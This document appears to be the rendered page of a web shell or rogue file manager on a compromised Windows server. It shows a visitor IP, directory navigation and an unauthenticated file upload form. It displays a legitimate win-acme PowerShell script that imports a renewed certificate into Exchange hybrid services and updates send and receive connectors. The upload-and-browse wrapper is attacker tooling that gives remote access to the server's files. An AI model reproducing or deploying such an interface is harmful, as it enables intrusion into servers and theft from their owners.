????<!DOCTYPE HTML>

<HTML>

<HEAD>

<title></title>

<style>

body{

font-family: monospace;

font-weight: bold;

font-size: 18px;

background-color: #c5c5c5;

color: #000;

}

#content tr:hover{

background-color: #ccc;

}

#content .first{

background-color: #ccc;

}

#content .first:hover{

background-color: #ccc;

}

table{

border: 3px #000 solid;

}

a{

color: #000;

text-decoration: none;

}

a:hover{

color: #00f;

}

input,select,textarea{

border: 1px #000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

input {

 font-size: 18px;

 font-weight: bold;

 padding: 5px;

}

select {

font-size: 19px

}

textarea {

font-size: 10px

}

td, tr { padding: 2px 5px; }



</style>

</HEAD>

<BODY>

<hr width="920" color="black"/>

<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.187</h2></p></center>

<hr width="920" color="black"/>

<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">

<tr><td style="padding: 8px">Current Path : <a href="?path=C:">C:</a>/<a href="?path=C:/opt">opt</a>/<a href="?path=C:/opt/win-acme">win-acme</a>/<a href="?path=C:/opt/win-acme/Scripts">Scripts</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="Upload" />

</form>

</td></tr><tr><td style='padding: 8px'>Current File : C:/opt/win-acme/Scripts/ImportExchangeHybrid.ps1</tr></td></table><br /><pre>&lt;#
.SYNOPSIS
Imports a cert from WASC renewal into Exchange services, this script also runs commands needed to enable the certificate for use on Hybrid Exchange.
.DESCRIPTION
Note that this script is intended to be run via the install script plugin from WASC via the batch script wrapper. As such, we use positional parameters to avoid issues with using a dash in the cmd line. 

THIS SCRIPT IS INCOMPLETE AND *mostly* UNTESTED (some modifications have come in from people using it successfully)
This modification of the original Exchange script is designed to run on a single Exchange server in a hybrid environment - it&#039;s not been tested against multiple servers (the import process would need run on each server)
Documentation referenced from https://technet.microsoft.com/en-us/library/aa997231(v=exchg.160).aspx

Proper information should be available here

https://github.com/PKISharp/win-acme/wiki/Install-Script

or more generally, here

https://github.com/PKISharp/win-acme/wiki/Example-Scripts

.PARAMETER NewCertThumbprint
The exact thumbprint of the cert to be imported. The script will copy this cert to the Personal store if not already there. 

.PARAMETER ExchangeServices
a comma-separated string (no spaces) of all exchange services to import the cert into. Full list of possibilities can be found here: 

https://technet.microsoft.com/en-us/library/aa997231(v=exchg.160).aspx

.PARAMETER LeaveOldExchangeCerts
A bool (as an int, since bools are difficult to pass through as parameters) to determine if old exchange certs with the same CN should be deleted.

1 - Leaves old Exchange certs
0 - Deletes old Exchange certs

.PARAMETER RenewalId
(Central Certificate Store) Id of the WASC renewal, used to determine the file name in the CertificatePath.

.PARAMETER CertificatePath
(Central Certificate Store) Path to the WACS certificate directory. The certificate that is imported will be &quot;$(RenewalId)-all.pfx&quot; from this directory.

.PARAMETER PfxPassword
(Central Certificate Store) Password of the .pfx file.

.PARAMETER FriendlyName
(Central Certificate Store) Friendly name to use when importing the .pfx file.

.PARAMETER DebugOn
Include this switch parameter to write debug outputs for troubleshooting

.EXAMPLE 

ImportExchange.ps1 &lt;certThumbprint&gt; IIS,SMTP,IMAP

If not using central certificate store, the script can be executed as either

.EXAMPLE 

ImportExchange.ps1 &lt;certThumbprint&gt; IIS,SMTP,IMAP 0

to remove old certs

.EXAMPLE 

ImportExchange.ps1 &lt;certThumbprint&gt; IIS,SMTP,IMAP 1 &lt;renewalId&gt; &lt;certificatePath&gt; &lt;pfxPassword&gt; &lt;friendlyName&gt;

If using central certificate store, WASC will place the certificate in that path named after the id

.NOTES

#&gt;

param(
	[Parameter(Position=0,Mandatory=$true)]
	[string]
	$NewCertThumbprint,
	
	[Parameter(Position=1,Mandatory=$true)]
	[string]
	$ExchangeServices,
	
	[Parameter(Position=2,Mandatory=$false)]
	[int]
	$LeaveOldExchangeCerts = 1,
	
	[Parameter(Position=4,Mandatory=$false)]
	[string]
	$CacheFile,
	
	[Parameter(Position=5,Mandatory=$false)]
	[string]
	$PfxPassword,
	
	[Parameter(Position=6,Mandatory=$false)]
	[string]
	$FriendlyName,
	
	[switch]$DebugOn
)

if($DebugOn){
	$DebugPreference = &quot;Continue&quot;
}

If($OSVersion -eq &quot;Windows Server 2008 R2 Standard&quot; -and $PSVersionTable.PSVersion.Major -lt 5)
{
	Write-Error &quot;Please upgrade Powershell version. See this URL for details: https://github.com/PKISharp/win-acme/issues/1104&quot;
	exit
}

# Print debugging info to make sure the parameters arrived
Write-Host &quot;NewCertThumbprint: $NewCertThumbprint&quot;
Write-Host &quot;ExchangeServices: $ExchangeServices&quot;
Write-Host &quot;LeaveOldExchangeCerts: $LeaveOldExchangeCerts&quot;
Write-Host &quot;RenewalId: $RenewalId&quot;
Write-Host &quot;CacheFile: $CacheFile&quot;
Write-Host &quot;FriendlyName: $FriendlyName&quot;

# Load Exchange Management shell
# https://github.com/win-acme/win-acme/issues/1372 
$ServerFQDN = ([System.Net.Dns]::GetHostByName(($env:computerName))).Hostname
$ConnectionUri = &quot;http://$ServerFQDN/PowerShell/&quot;
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri $ConnectionUri
Import-PSSession $Session

# Test if the Cmdlet is there now
$Command = Get-Command &quot;Enable-ExchangeCertificate&quot; -errorAction SilentlyContinue
if ($Command -eq $null) 
{
	Write-Error &quot;Exchange Management Tools for Powershell not installed&quot;
	return
}
	
try 
{
    # Load certificate
    Write-Host &quot;Checking if certificate can be found in the right store...&quot;
    $Certificate = `
	    Get-ChildItem -Path Cert:\LocalMachine -Recurse `
	    | Where-Object {$_.thumbprint -eq $NewCertThumbprint} `
	    | Sort-Object -Descending `
	    | Select-Object -f 1
            
	# Make sure variable is defined
	Get-ChildItem $Certificate.PSPath -ErrorAction Stop | Out-Null
	
	# This command actually updates Exchange
	try 
	{
		Write-Host &quot;Updating Exchange services...&quot;
		Enable-ExchangeCertificate -Services $ExchangeServices -Thumbprint $Certificate.Thumbprint -Force -ErrorAction Stop
        $TLSCert = Get-ExchangeCertificate -Thumbprint $Certificate.Thumbprint
        $TLSCertName = &quot;&lt;I&gt;$($TLSCert.Issuer)&lt;S&gt;$($TLSCert.Subject)&quot;
		Write-Host &quot;Updating &#039;Outbound to Office 365&#039; send connector&quot;
        Get-SendConnector &#039;*Outbound to Office 365*&#039; | Set-SendConnector -TlsCertificateName $TLSCertName
		Write-Host &quot;Updating &#039;Default Frontend&#039; receive connector for the current server&quot;
        Get-ReceiveConnector &quot;*Default Frontend $(hostname)*&quot; | Set-ReceiveConnector -TlsCertificateName $TLSCertName
		Write-Host &quot;Updating Set-HybridConfiguration certificate field&quot;
        Set-HybridConfiguration -TlsCertificateName $TLSCertName
		Write-Host &quot;Certificate set&quot;
	}
	catch 
	{
		Write-Error &quot;Error occurred when applying certificate to Exchange&quot;
		throw
	}
	
	if ($LeaveOldExchangeCerts -ne 1)
	{
		Write-Host &quot;Old Exchange certificates being cleaned up&quot;
		try 
		{
			Get-ExchangeCertificate -DomainName $Certificate.Subject.split(&quot;,&quot;)[0].split(&quot;=&quot;)[1] `
				| Where-Object -FilterScript {
					$_.Thumbprint -ne $NewCertThumbprint
				} `
			| Remove-ExchangeCertificate -Confirm:$false
		} 
		catch 
		{
			Write-Error &quot;Error cleaning up old certificates Get-ExchangeCertificate/Remove-ExchangeCertificate&quot;
		}
	}
} 
catch 
{
    Write-Error &quot;Script hasn&#039;t completed.&quot;
}
</pre><center><hr width="920" color="black"/> <center>

</BODY>

</HTML>